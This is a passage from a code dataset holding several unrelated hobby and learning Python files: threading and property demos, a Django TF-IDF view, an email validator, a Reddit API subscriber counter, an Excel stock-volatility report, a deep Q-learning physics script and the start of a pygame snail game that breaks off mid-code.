df.to_pickle(out_lotecaf_rounds)\n\n\nif __name__ == '__main__':\n save_processed_rounds()\n","repo_name":"lowerthansound/laughing-telegram","sub_path":"src/data/process/loteca_rounds.py","file_name":"loteca_rounds.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"29231964507","text":"import time,threading\nblance=0\nlock = threading.Lock()\ndef change_it(n):\n global blance\n blance=blance+n\n blance=blance-n\n\ndef run_thread(n):\n for i in range(2000000):\n lock.acquire()\n try:\n change_it(n)\n finally:\n lock.release()\n\n\nt1=threading.Thread(target=run_thread,args=(5,))\nt2=threading.Thread(target=run_thread,args=(4,))\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint('blance:',blance)\n#死循环\n'''import multiprocessing\n\ndef lop():\n x=0\n while True:\n x=x^1\n\nfor i in range(10):\n t=threading.Thread(target=lop)\n t.start()\n'''\n#ThreadLocal\n# python 还提供了 ThreadLocal 变量,它本身是一个全局变量,\n# 但是每个线程却可以利用它来保存属于自己的私有数据,这些私有数据对其他线程也是不可见的\n\n\n\n","repo_name":"guodaxiaa/python_office","sub_path":"多线程-lock.py","file_name":"多线程-lock.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"28657630681","text":"import itertools\nimport math\nimport re\nfrom collections import OrderedDict\n\nfrom django.db.models import F\nfrom django.shortcuts import render\n\nfrom .models import Word_in_texts\n\nTOTAL_DOC_KEY = '__count_doc'\n\n\ndef get_updated_quantity(word):\n data, created = Word_in_texts.objects.get_or_create(\n word=word, defaults={'quantity': 0}\n )\n data.quantity = F('quantity') + 1\n data.save(update_fields=['quantity'])\n data.refresh_from_db()\n return data.quantity\n\n\ndef upload(request):\n if request.method == 'POST' and request.FILES['upload']:\n upload = request.FILES['upload'].read().decode('utf-8')\n upload = re.sub(r'[^\\w\\s]', '', upload)\n text = upload.split()\n count = get_updated_quantity(TOTAL_DOC_KEY)\n words = {}\n for word in text:\n if word in words:\n words[word][0] += 1\n else:\n words[word] = [1]\n for k, v in words.items():\n word_in_texts = get_updated_quantity(k)\n idf = round(math.log10(count/word_in_texts), 2)\n words[k].append(idf)\n words = OrderedDict(sorted(words.items(),\n key=lambda kv: kv[1][1], reverse=True))\n words = dict(itertools.islice(words.items(), 50))\n return render(request, 'upload.html', {'words': words})\n return render(request, 'upload.html')\n ","repo_name":"myagkova/words_calculator","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26365212835","text":"import csv\n\ncounter = 0\n#max_num_sent = 1000000\nmax_num_sent = 500000\n\nall_data_list = list()\nwith open(\"domain_data/all_fewshot.txt\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n if counter < max_num_sent:\n counter+=1\n line = line.strip()\n #print(line)\n all_data_list.append([line])\n else:\n break\n\nprint(\"Domain:\",counter)\n\n#with open(\"openwebtext.txt\") as f:\nwith open(\"retrieve.txt\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n if counter < max_num_sent:\n counter+=1\n line = line.strip()\n all_data_list.append([line])\n else:\n break\nprint(\"All:\",counter)\n\nwith open(\"train.txt\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(all_data_list)\n\n","repo_name":"thunlp/CSS-LM","sub_path":"data/openwebtext/combine_domain_and_openweb.py","file_name":"combine_domain_and_openweb.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
+{"seq_id":"6376446755","text":"\"\"\"\nBMI指数:(BMI是计算而来的,很明显它听起来像一个属性而非方法,如果我们将其作为一个属性,更便于理解)\n成人的BMI数值:\n过轻:低于18.5\n正常:18.5-23.9\n过重:24-27\n肥胖:28-32\n非常肥胖:高于32\n体质指数(BMI)= 体重(KG)/ 身高^2(M)\nEX:70KG / (1.75*1.75) = 22.86\n\"\"\"\n# 一、普通解决方法\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# p = People('jack', 48, 1.65)\n# p.bmi = p.weight / (p.height ** 2)\n#\n# print(p.bmi)\n\"\"\"\n17.63085399449036\negon\ndragon\n名字必须是字符串类型\ndragon\n不允许删除\n\"\"\"\n\n# 二、添加函数改写\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# def bmi(self):\n# print('===>')\n# return self.weight / (self.height ** 2)\n#\n# p = People('SH', 53, 1.70)\n# print(p.bmi()) # bmi是一个名词,却使用bmi(),容易误解为一个动作\n\n\n# 三、增加property装饰器\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# @property # 应用场景:有一个值是通过计算得来的,首选定义方法,运用property让使用者感知不到\n# def bmi(self):\n# print('===>')\n# return self.weight / (self.height ** 2)\n#\n# p = People('SH', 53, 1.70)\n# print(p.bmi) # 使用者像访问数据属性一样访问bmi,方法被伪装\n#\n# p.height = 1.82\n# print(p.bmi)\n#\n# p.bmi = 333 # 报错,看起来像数据属性,其实还是一个方法,不能赋值\n\n\n\"\"\"\nproperty的另一种用法\n\"\"\"\n# class People:\n# def __init__(self, name):\n# self.__name = name\n#\n# def get_name(self):\n# return self.__name\n#\n# p = People('egon')\n# print(p.get_name()) # 输出:egon\n\n\n\n# class People:\n# def __init__(self, name):\n# self.__name = name\n#\n# @property\n# def name(self):\n# return self.__name\n#\n# p = People('egon')\n# print(p.name)\n\n\nclass People:\n def __init__(self, name):\n self.__name = name\n\n @property\n def name(self):\n # print('getter')\n return self.__name\n\n @name.setter\n def name(self, val):\n # print('setter', val)\n if not isinstance(val, str):\n print('名字必须是字符串类型')\n return\n self.__name=val\n\n @name.deleter\n def name(self):\n # print('deleter')\n print('不允许删除')\n\np = People('egon')\nprint(p.name) # 输出:egon\np.name = 'dragon'\nprint(p.name) # 输出:dragon # name修改成功\n\np.name = 123 # 输出:名字必须是字符串类型(报错)\nprint(p.name) # 输出:dragon\n\ndel p.name # 输出:不允许删除(报错)\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第五章-面向对象/21 property的使用.py","file_name":"21 property的使用.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70887681068","text":"# -*- coding: utf-8 -*-\nlocal_available = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'*+-/=?^_`{|}~.\")\ndomain_available = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-.]\")\nspec = set(\"(),:;<>@[\\] \")\n\n\ndef check_local(local):\n \"\"\"\n 1. прописные и строчные латинские буквы от A до Z и от a до z ;\n 2. цифры от 0 до 9 ;\n 3. специальные символы !#$%&'*+-/=?^_`{|}~ ;\n 4. точка . , при условии, что это не первый или последний символ, если он не заключен в кавычки, а также при условии, что он не появляется последовательно, если он не заключен в кавычки\n 5. пробел и символы \"(),:;<>@[\\] разрешены только внутри строки в кавычках\n \"\"\"\n in_commas = False\n if local[0] == \".\" or local[-1] == \".\":\n return False\n for c in local:\n if c == '\\\"':\n in_commas = not in_commas\n continue\n\n if not in_commas:\n if c == \".\":\n if dot:\n return False\n dot = True\n else:\n dot = False\n if not c in local_available or c in spec:\n return False\n else:\n if not c in local_available and not c in spec:\n return False\n return True\n\n\ndef check_domain(domain):\n \"\"\"\n 1. строчные латинские буквы: abcdefghijklmnopqrstuvwxyz ,\n 2. заглавные латинские буквы: ABCDEFGHIJKLMNOPQRSTUVWXYZ ,\n 3. цифры: 0123456789 ,\n 4. дефис: - (не первый и не последний символ),\n 5. точка: . (не первый и не последний символ и не две подряд),\n 6. может содержать строку, заключенную в квадратные скобки\n \"\"\"\n if domain[0] == \"-\" or domain[-1] == \"-\" or domain.count(\".\") == 0:\n return \"no\"\n if domain[0] == \".\" or domain[-1] == \".\":\n return \"no\"\n if domain.count(\"..\") != 0:\n return \"no\"\n if domain.count(\"]\") > 1:\n return \"no\"\n if domain.count(\"[\") != 0:\n if domain[0] != \"[\":\n return \"no\"\n for c in domain:\n if not c in domain_available:\n return \"no\"\n return \"yes\"\n\n\ndef check_email(st):\n # макс. 64@255 символов, всего не более 256\n if st.count(\"@\") == 0 or len(st) > 256:\n return \"no\"\n local = st.split(\"@\")[0]\n domain = st.split(\"@\")[1]\n if len(local) == 0 or len(domain) == 0:\n return \"no\"\n if len(local) > 64 or len(domain) > 255:\n return \"no\"\n\n if check_local(local):\n return check_domain(domain)\n else:\n return \"no\"\n\n\ns = input()\nprint(check_email(s))\n","repo_name":"ChristieMartin/CMC-MSU-prac","sub_path":"5th_sem/python/АНД/hw1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33753009914","text":"#!/usr/bin/python3\n\"\"\"function that queries the Reddit API and returns the number of\nsubscribers\"\"\"\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"queries the Reddit API\n\n args: subreddit - subreddit name\n\n returns the number of subscribers\n \"\"\"\n\n url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {\"User-Agent\": \"ChangeMeClient/0.1 by Makaburi_McMaina\"}\n res = requests.get(url, headers=headers, allow_redirects=False)\n\n if res.status_code == 200:\n return(res.json().get('data').get('subscribers'))\n return 0\n","repo_name":"JI-Maina/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33892750126","text":"import multiprocessing as mp\nimport os\ntry:\n from queue import Queue, Empty\nexcept ImportError:\n from Queue import Queue, Empty # python 2.x\n\nBLOCKSIZE = 0x100000\n\ndef f(qfd):\n q, fd = qfd[0], qfd[1]\n for block in nonblocking_read(fd):\n q.put(block, False)\n\ndef nonblocking_read(fd):\n while True:\n try:\n block = os.read(fd, BLOCKSIZE)\n except BlockingIOError:\n yield bytearray() #yield empty buffer if no data\n continue\n \n if not block:\n yield bytearray()\n break\n\n yield block\n\ndef consumer(queue):\n while True:\n try:\n block = queue.get_nowait() # or q.get(timeout=.1)\n except Empty:\n yield bytearray()\n break\n else:\n yield block\n\ndef main():\n import glob\n epics_files = glob.glob(\"/reg/d/psdm/xpp/xpptut15/scratch/mona/xtc2/smalldata/data-r0001-s*.xtc2\")\n epics_fds = [os.open(epics_file, os.O_RDONLY | os.O_NONBLOCK) for epics_file in epics_files]\n p = mp.Pool(processes=len(epics_fds))\n q = mp.Manager().Queue()\n p.map(f, [(q, epics_fd) for epics_fd in epics_fds])\n\n for block in consumer(q):\n print('received %d bytes'%(memoryview(block).shape[0]))\n \n \"\"\" \n its = []\n while True:\n try:\n print(\"Waiting for item from queue for up to 5 seconds\")\n i = q.get(True, 5)\n print(\"found %d bytes from the queue.\"%(memoryview(i).shape[0]))\n its.append(i)\n except Empty:\n print(\"Caught queue empty exception, done\")\n break\n print(\"processed %d items, completion successful\"%len(its))\n \"\"\"\n\n p.close()\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/more_thread_and_queue.py","file_name":"more_thread_and_queue.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73800063468","text":"def solution(key, lock):\n answer = False\n def rclock90(key):\n key90=[]\n for i in key:\n key90.append(i[:])\n lenkey = len(key90)\n for i in range(lenkey):\n for j in range(lenkey):\n key[i][j] = key90[j][lenkey-1-i]\n \n for i in key:\n print(i)\n\n for i in lock:\n print(i)\n\n \n lenkey = len(key)\n for _ in range(4):\n tmplock = lock[:]\n for i in range(lenkey):\n for j in range(lenkey):\n for a in range(i):\n for b in range(j):\n tmplock[a][b] += key[a][b]\n if tmplock == [[1,1,1],[1,1,1],[1,1,1]]:\n answer = True\n return True\n rclock90(key)\n \n\n \n\n\n return answer\n\nkey = input()\nlock = input()\n\n\nprint(solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]],[[1, 1, 1], [1, 1, 0], [1, 0, 1]]))\n\n\n\n\"\"\"\nfor i in tmplock:\n print(i)\n print(\"---\")\n[[0, 0, 0], [1, 0, 0], [0, 1, 1]]\n[[1, 1, 1], [1, 1, 0], [1, 0, 1]]\n\"\"\"","repo_name":"csw1511/algorithm_study","sub_path":"Python codingtest bookstudy/10 implement practice/4 lock and key.py","file_name":"4 lock and key.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71497644908","text":"\r\nimport pandas as pd\r\nimport yfinance as yf\r\nimport datetime as dt\r\nimport xlsxwriter\r\nimport math\r\nimport statistics\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nfileName = input(\"Enter a name for the excel file: \")\r\ndef generate_df(ticker, start_date='2021-1-1', volatilityDays=50, calendarYear=365):\r\n df = yf.download(ticker, start_date, end = '2022-06-30')\r\n df = df.drop([\"Open\", \"High\", \"Low\", \"Volume\", \"Close\"], axis=1)\r\n df = df.reset_index()\r\n df[\"Px Change\"] = None\r\n df[\"Volatility\"] = None\r\n closes = df[\"Adj Close\"].tolist()\r\n for i in range(1, len(df)):\r\n df.iat[i, 2] =round((math.log(df.iloc[i, 1] / df.iloc[i-1, 1])),\r\n 4)\r\n if i >= volatilityDays:\r\n df.iat[i, 3] = round((statistics.stdev(closes[i-50:i]) * math.sqrt(calendarYear)), 4) / 100\r\n df['Adj Close'] = df['Adj Close'].apply(lambda x: round(x, 2))\r\n volatilities = df[\"Volatility\"][50:].tolist()\r\n meanVol = statistics.mean(volatilities)\r\n prices = df[\"Adj Close\"].tolist()\r\n meanPrice = statistics.mean(prices)\r\n factor = meanPrice / meanVol\r\n df[\"Adj Vol\"] = df[\"Volatility\"] * factor\r\n for i in range(50):\r\n df.iat[i, 4] = None\r\n return df\r\n\r\n\r\n\r\nstocks = [\"AMAM\", \"HCWB\", \"JANX\", \"HOWL\", \"IKNA\", \"BOLT\", \"SNSE\",\r\n \"CGEM\", \"SBTX\", \"ONCR\", \"NRIX\", \"ALXO\", \"ITOS\", \"AAPL\"]\r\n\r\ndef generate_dfs(stocks, calendarYear, volatilityDays, start_date):\r\n dfs = {}\r\n for stock in stocks:\r\n df = generate_df(stock, start_date, volatilityDays, calendarYear)\r\n dfs[stock] = df\r\n return dfs\r\n\r\nprint(\"Gathering Data\")\r\ndfs = generate_dfs(stocks, 365, 50, dt.date(2015, 1, 1))\r\n\r\n\r\n\r\n\r\nmainWorkbook = xlsxwriter.Workbook(f'{fileName}.xlsx')\r\n\r\ndef writeToWorksheet(df, wb, ticker, calenderYear=365,\r\n volatilityDays=50):\r\n ws = wb.add_worksheet(ticker)\r\n ws.set_column(0, 0, 12)\r\n ws.set_column(1, 1, 10)\r\n ws.set_column(2, 4, 10)\r\n menu_format = wb.add_format({'bg_color' : '#004481',\r\n 'font_color' : 'white',\r\n 'font_name' : 'Arial',\r\n 'font_size' : 10})\r\n menu_responses = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'align' : 'right'})\r\n olive_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#cabc96'})\r\n olive_background_pct = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#cabc96',\r\n 'num_format' : '0.00%'})\r\n grey_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#eff1ef'})\r\n grey_background_num = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#eff1ef',\r\n 'num_format' : '0.00%'})\r\n blue_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#baeafc'})\r\n menuWords = [\"Source\", \"Ticker\", \"Calendar Year\", \"Volatility Days\",\r\n \"Start Date\", \"Close\", \"Current\", \"Average\", \"Maximum\",\r\n \"Minimum\"]\r\n for i in range(len(menuWords)):\r\n ws.write(i, 0, menuWords[i], menu_format)\r\n ws.write(0, 1, \"Yahoo\", menu_responses)\r\n ws.write(1, 1, ticker, menu_responses)\r\n ws.write(2, 1, calenderYear, menu_responses)\r\n ws.write(3, 1, volatilityDays, menu_responses)\r\n ws.write(4, 1, df.iloc[0][0].strftime(\"%m/%d/%Y\"), menu_responses)\r\n ws.write(10, 0, \"Date\", grey_background)\r\n ws.write(10, 1, \"Adj Close\", grey_background)\r\n ws.write(10, 2, \"Px Change\", grey_background)\r\n ws.write(10, 3, \"Volatility\", grey_background)\r\n ws.write(5, 1, df.iloc[len(df)-1][1], olive_background)\r\n ws.write(10, 4, \"Adj Vol\", grey_background)\r\n volatilities = (df[\"Volatility\"].tolist())[volatilityDays:]\r\n if len(df) > volatilityDays:\r\n ws.write(6, 1, df.iloc[len(df)-1][3], olive_background_pct)\r\n ws.write(7, 1, statistics.mean(volatilities),\r\n olive_background_pct)\r\n ws.write(8, 1, max(volatilities), olive_background_pct)\r\n ws.write(9, 1, min(volatilities), olive_background_pct)\r\n for i in range(len(df)):\r\n try:\r\n ws.write(i+11, 0, df.iloc[i][0].strftime(\"%m/%d/%Y\"),\r\n blue_background)\r\n ws.write(i+11, 1, df.iloc[i][1], blue_background)\r\n ws.write(i+11, 2, df.iloc[i][2], grey_background_num)\r\n ws.write(i+11, 3, df.iloc[i][3], grey_background_num)\r\n ws.write(i+11, 4, df.iloc[i][4], grey_background_num)\r\n except:\r\n pass\r\n chart = wb.add_chart({'type' : 'line'})\r\n numCells = len(df)\r\n chart.add_series({'values' : f'={ticker}!$B$12:$B${str(numCells + 11)}', 'name' : f'={ticker}!$B$11'})\r\n chart.add_series({'values' : f'={ticker}!$E${volatilityDays}:$E${str(numCells + 11)}', 'name' : f'={ticker}!$D$11'})\r\n ws.insert_chart('F11', chart)\r\n\r\n\r\n\r\n\r\nprint(\"Compiling Excel Sheets\")\r\nfor stock in stocks:\r\n writeToWorksheet(dfs[stock], mainWorkbook, stock)\r\n\r\nmainWorkbook.close()\r\n\r\nprint(f\"File saved as {fileName}.xlsx\")\r\n","repo_name":"jleuschen17/excelAutomater","sub_path":"excelAutomater.py","file_name":"excelAutomater.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74534250667","text":"\"\"\"\nBased in part on http://outlace.com/rlpart3.html\n\nI used this as a way to understand Q-learning, \nand then wrote my version based on this.\n\"\"\"\n\nimport sys\n\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import RMSprop\nimport matplotlib.pyplot as plt\nfrom scipy.misc import comb\n\nimport lieb_liniger_state as lls\nimport rho_form_factor as rff\nfrom sum_rule import compute_average_sumrule, left_side, right_side\nfrom utils import map_to_entire_space, map_to_bethe_numbers, get_allowed_indices, select_action\n\n\ndef neural_net(N_world):\n model = Sequential()\n model.add(Dense(units=int(N_world**1.5), kernel_initializer='lecun_uniform', activation='tanh', input_dim=N_world))\n model.add(Dense(units=int(N_world**1.5), kernel_initializer='lecun_uniform', activation='tanh'))\n model.add(Dense(units=N_world**2, kernel_initializer='lecun_uniform', activation='tanh'))\n model.compile(loss='mse', optimizer=RMSprop())\n model.summary()\n return model\n\n\ndef get_sumrule_reward(lstate, rstate):\n return (lstate.energy - rstate.energy) * np.abs(rff.rho_form_factor(lstate, rstate))**2\n\n\ndef get_reward_for_close_states(ff, lstate, rstate, N_world):\n if np.abs(ff) > 0.00001:\n return np.abs(ff)**0.1\n elif distance_to_rstate(lstate, rstate) < N_world**0.5:\n return 1 / distance_to_rstate(lstate, rstate)**0.1\n else:\n return -1\n\n\ndef get_form_factor_reward(lstate, rstate):\n return np.tanh(np.log1p(np.abs(rff.rho_form_factor(lstate, rstate))**2))\n\ndef get_reward_at_final_step(dsf_data, n, no_of_steps, c, L, N, I_max, N_world, rstate):\n # Quite logical that this does not perform well since it puts all reward into single place, which means learning (if any) is very slow.\n if n == no_of_steps:\n return compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world)\n else:\n return 0\n\n\ndef get_partial_sumrule_reward_at_every_step(dsf_data, c, L, N, lstate, rstate):\n if lstate.integer_momentum != 0:\n return left_side(dsf_data[lstate.integer_momentum], rstate.energy) / right_side(lstate.integer_momentum, L, N)\n else:\n return 0\n\n\ndef get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate):\n return compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world)\n\n\ndef get_relative_contribution_reward(dsf_data, L, N, I_max, N_world, N_states, rstate):\n return get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate) / N_states\n\n\ndef get_reward_delta_sumrule(dsf_data, L, N, I_max, N_world, prev_sumrule, rstate):\n return get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate) - prev_sumrule\n\n\ndef get_relative_reward_per_slice(dsf_data, c, L, N, k, rstate):\n if k != 0:\n return left_side(dsf_data[k], rstate.energy) / right_side(k, L, N) / len(dsf_data[k])\n else:\n return 0\n\n\ndef distance_to_rstate(lstate, rstate):\n \"\"\"Calculate the 'distance' between lstate and rstate.\"\"\"\n return np.sum(np.abs(lstate.Is - rstate.Is))\n\n\n\ndef epsilon_greedy(qval, state, previously_visited, epsilon, max_I, N_world, N, check_no_of_pairs=True):\n if np.random.random() < epsilon:\n allowed_actions = get_allowed_indices(state, N_world)\n np.random.shuffle(allowed_actions)\n return select_action(allowed_actions, state, previously_visited, max_I, N_world, N, check_no_of_pairs)\n else:\n return select_action(list(zip(*np.unravel_index(qval[0].argsort(), (N_world, N_world)))), state, previously_visited, max_I, N_world, N, check_no_of_pairs)\n\n\ndef q_learning(N_world, I_max, c, L, N, gamma=0.975, alpha=1, epochs=100, epsilon=1, no_of_steps=100, model=None, best_dsf=None, check_no_of_pairs=False):\n # Allow for further training of a given model.\n if not model:\n model = neural_net(N_world)\n rstate = lls.lieb_liniger_state(c, L, N)\n rstate.calculate_all()\n highest_achieved_sumrule = 0\n sums = []\n best_sums = []\n print(f\"Size of search space is Choose[N_world, N]={comb(N_world, N):.3e}\")\n for i in range(1, epochs + 1):\n dsf_data = {}\n previously_visited_states = []\n state = np.array(map_to_entire_space(rstate.Is, I_max), dtype=np.int)\n previously_visited_states.append(list(state))\n previous_sumrule = 0\n for n in range(1, no_of_steps + 1):\n Q = model.predict(state.reshape(1, -1), batch_size=1)\n new_state, action = epsilon_greedy(Q, state, previously_visited_states, epsilon, I_max, N_world, N, check_no_of_pairs=check_no_of_pairs)\n previously_visited_states.append(list(new_state))\n\n new_lstate = lls.lieb_liniger_state(c, L, N, map_to_bethe_numbers(new_state, I_max))\n new_lstate.calculate_all()\n new_lstate.ff = rff.rho_form_factor(new_lstate, rstate)\n\n if new_lstate.integer_momentum in dsf_data.keys():\n dsf_data[new_lstate.integer_momentum].append(new_lstate)\n else:\n dsf_data[new_lstate.integer_momentum] = [new_lstate]\n\n # reward = get_sumrule_reward(new_lstate, rstate)\n reward = get_reward_for_close_states(new_lstate.ff, new_lstate, rstate, N_world)\n # reward = get_form_factor_reward(new_lstate, rstate)\n\n # reward = get_reward_at_final_step(dsf_data, i, no_of_steps, c, L, N, I_max, N_world, rstate)\n # reward = get_partial_sumrule_reward_at_every_step(dsf_data, c, L, N, new_lstate, rstate)\n\n # reward = get_full_sumrule_reward_at_every_step(dsf_data, c, L, N, I_max, N_world, rstate)\n # reward = get_relative_contribution_reward(dsf_data, L, N, I_max, N_world, n, rstate)\n # reward = get_reward_delta_sumrule(dsf_data, L, N, I_max, N_world, previous_sumrule, rstate)\n # reward = get_relative_reward_per_slice(dsf_data, c, L, N, I_max, N_world, new_lstate.integer_momentum, rstate)\n\n\n new_Q = model.predict(new_state.reshape(1, -1), batch_size=1)\n _, new_action = select_action(list(zip(*np.unravel_index(new_Q[0].argsort(), (N_world, N_world)))), state, previously_visited_states, I_max, N_world, N, check_no_of_pairs=False)\n new_best_action = np.ravel_multi_index(new_action, (N_world, N_world))\n new_max_Q = new_Q[0][new_best_action]\n\n y = np.zeros((1, N_world * N_world))\n y[:] = Q[:]\n\n if n == no_of_steps:\n update = reward\n else:\n update = (reward + gamma * new_max_Q)\n\n y[0][new_best_action] = (1 - alpha) * y[0][new_best_action] + alpha * update\n # A batch size 1 makes a huge positive difference in learning performance (probably because there is less overfitting to the single data point).\n model.fit(state.reshape(1, -1), y, batch_size=1, verbose=0)\n\n state = new_state\n\n prev_sumrule = compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False)\n\n sys.stdout.write(f\"epoch: {i:{len(str(epochs))}}, n={n:{len(str(no_of_steps))}}, current sumrule: {compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False):.10f}, best sumrule: {highest_achieved_sumrule:.10f}\\r\")\n sys.stdout.flush()\n\n if epsilon > 0.1:\n epsilon -= 1 / epochs\n\n ave_sum_rule = compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False)\n sums.append(ave_sum_rule)\n print(f\"epoch: {i:{len(str(epochs))}}, n={n:{len(str(no_of_steps))}}, current sumrule: {ave_sum_rule:.10f}, best sumrule: {highest_achieved_sumrule:.10f}\")\n if ave_sum_rule > highest_achieved_sumrule:\n highest_achieved_sumrule = ave_sum_rule\n best_dsf = dsf_data\n best_sums.append(highest_achieved_sumrule)\n\n return model, best_dsf, sums, best_sums\n\n","repo_name":"teunzwart/deepscanning","sub_path":"deep_q_learning.py","file_name":"deep_q_learning.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37574004213","text":"import pygame\nimport sys\nfrom ball1 import Ball\nfrom ball_vertically import ball_v\nfrom random import randint\nfrom button import Button # Отрисовка кнопок в меню\nfrom pygame.locals import * # это добавляет обработку клавиш\n\n#########################################################\n\nsprite_appear_time = 2000 # Интервал появления спрайтов милисекунд\nW, H = 1000, 570 # Соотношения рабочего окна, пикселей\nFPS = 60\ngame_score = 0 # Начальный опыт\ngame_score_max_level = 100\ngame_score_plus = 7\ngame_score_minus = -2\ngame_score_max_minus = -3\ndamage_1 = -100\ndamage_2 = -100\nis_jump = False\njump_count = 10\nVERSION_of_program = 1 # Весия програмым\nmultiplier_hard_easy = 1\nmultiplier_speed = 1\n\n#########################################################\npygame.display.set_icon(pygame.image.load(\"images/snail.png\")) # Иконка программы\npygame.init()\npygame.time.set_timer(pygame.USEREVENT, sprite_appear_time) # Таймер который каждые 2 секунды создает событие (\n# создание спрайтов)\nf = pygame.font.SysFont('arial', 30) # Шрифт опыта\n\nSCREEN = pygame.display.set_mode((W, H)) # Устанавливаем рабочую область\npygame.display.set_caption(\"EAM1studio: Snail Trip\")\n\n#########################################################\n\n# Music\npygame.mixer.pre_init(44100, -16, 1, 512) # Преинициализация чтобы звук эффекты раньше подгрузились и не отставали\nsound_menu = pygame.mixer.Sound('musics/vyibor-nujnogo-deystviya.ogg')\nsound_collideBalls = pygame.mixer.Sound('musics/zvonkiy-schelchok.ogg')\nsound_usui = pygame.mixer.Sound('musics/usui.ogg')\npygame.mixer.music.load('musics/July_level_two_compresed.mp3')\npygame.mixer.music.play(loops=-1, start=54)\nis_music_play = True # ToDo Сделать ВКЛ\n#########################################################\n\n# Подгружаем фон, героя\nbg = pygame.image.load('images/background.jpg').convert()\nbg_first_first = pygame.image.load('images/background_first_first.jpg').convert() # Сразу подгруизм фон для уровней\nbg_first_two = pygame.image.load('images/background_first_two.jpg').convert()\nbg_third_one = pygame.image.load('images/background_third_one.jpg').convert()\nbg_third_two = pygame.image.load('images/background_third_two.jpg').convert()\nbg_fourth = pygame.image.load('images/background_fourth.jpg').convert()\n\nscore = pygame.image.load('images/score_fon.png').convert_alpha()\nsnail = pygame.image.load('images/snail.png').convert_alpha()\n# Change size of hero\nsnail = pygame.transform.scale(snail, (snail.get_width() // 3, snail.get_height() // 3))\nsnail_to_left = pygame.transform.flip(snail, 1, 0)\nsnail_to_right = snail\n# Start position of hero and general position\nt_rect = snail.get_rect(centerx=W // 4, bottom=H // 1.2)\n\nclock = pygame.time.Clock()\n\n#########################################################\n# Меню и разговорные окна\n\nBG_menu = pygame.image.load(\"assets/Background.png\")\n\n\n# Загружаем шрифт\n# ToDo нужно проверить работает ли на другом компьютере. Подгружает ли шрифт\ndef get_font(size): # Returns Press-Start-2P in the desired size\n return pygame.font.Font(\"assets/font.ttf\", size)\n\n\ndef play(time_screen_update=0):\n SCREEN.blit(bg_first_first, (0, 0))\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 340, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"BLACK\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_game = Button(image=None, pos=(W - 550, H - 100),\n text_input=\"GAME\", font=get_font(35), 